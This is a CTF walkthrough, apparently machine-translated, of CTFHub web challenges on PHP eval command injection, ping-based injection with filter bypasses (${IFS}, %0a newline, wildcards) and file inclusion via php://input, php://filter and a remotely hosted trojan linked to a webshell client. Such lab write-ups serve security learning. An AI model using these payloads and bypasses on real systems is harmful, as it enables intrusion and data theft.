One . Command injection

1.eval perform

First Understand what is eval function

eval The function will The value in parentheses is regarded as php Command execution

http://challenge-9a888bfbaae5e647.sandbox.ctfhub.com:10800/?cmd=

secondly yes $_REQUEST[ ] function

PHP One is provided in $_REQUEST Global variables , It is an inclusion of $_POST、$_GET and $_COOKIE Array of , Array structure and $_POST and $_GET similar .

That is to say, whether using POST Or use GET How to submit data , You can use $_REQUEST To get , You can even use $_REQUEST To get COOKIE Information about .

As the title , Our variable name is cmd, Change directly url

http://challenge-9a888bfbaae5e647.sandbox.ctfhub.com:10800/?cmd=$

$ That's what we're going to do php command

system("ls");
system("ls -a ");
system("ls /*");
system("find / -name 'flag'");

among , ls /* find flag

And then cat flag that will do

2. Command injection

It's simple , Direct structure payload

 127.0.0.1 In order to conform to the previous one ping ,

127.0.0.1 | ls
127.0.0.1 | cat flag

3. Filter cat

  The idea is the same as , Just put cat convert to less

4. Filter space

 Substitution of spaces 
cat file

 become ：
cat<file
cat${IFS}file

 Bypass Dafa ：< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS

5. Filter directory separator ： /

 payload as follows ： Use semicolons instead &

127.0.0.1;ls
127.0.0.1;cat flag

6. Comprehensive practice

 Regular means   Filter  | \ & ;  Space  / cat flag ctfhub 
 Bypass ：


& -> %0a ( The newline character is url After the coding , Namely 0a, So you need to url Column injection )
 Space  -> ${IFS}

cat -> less
flag -> f*lg

payload structure  

127.0.0.1%0als
127.0.0.1%0acd${IFS}fl*g_is_here
127.0.0.1%0acd${IFS}fl*g_is_here%0aless${IFS}f*ag_17291277221695.php

Two . File contains

1. File contains

  Meaning ： There is a parameter named file,file Point to shell.txt stay shell.txt There is a parameter named ctfhub, This is the point of command execution

Pictured , Find what we need flag that will do

/sys/devices/platform/serial8250/tty/ttyS0/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/pci0000:00/0000:00:03.0/virtio0/net/eth0/flags /sys/devices/virtual/net/dummy0/flags /sys/devices/virtual/net/lo/flags /usr/include/linux/flat.h /flag 

2.php Fake protocol

Basics ：php Pseudo protocol implements command execution _jcxj2934 The blog of -CSDN Blog

classical php:// 

First construct payload, Then directly execute the command

http://challenge-d754d82b1f1869d5.sandbox.ctfhub.com:10800/?file=php://input

Then grab the bag , To carry out an order , Be careful ： The request method is GET, So it can't be directly in hackbar In the use of post data Command transmission

 3. Remote contains

Try the file contains  

You can see , The file was executed

Method 1. Direct use php://input To carry out an order

Method 2. Put one on your server 1.txt The Trojan horse , Then use the server of the shooting range to access , Then link with ant sword

Reference link ： The remote file contains - You know (zhihu.com)

4. File read

The title has prompted us to read the file , It's simple

Limited by the topic , We can only use php://filter , Otherwise, use file:// It's fine too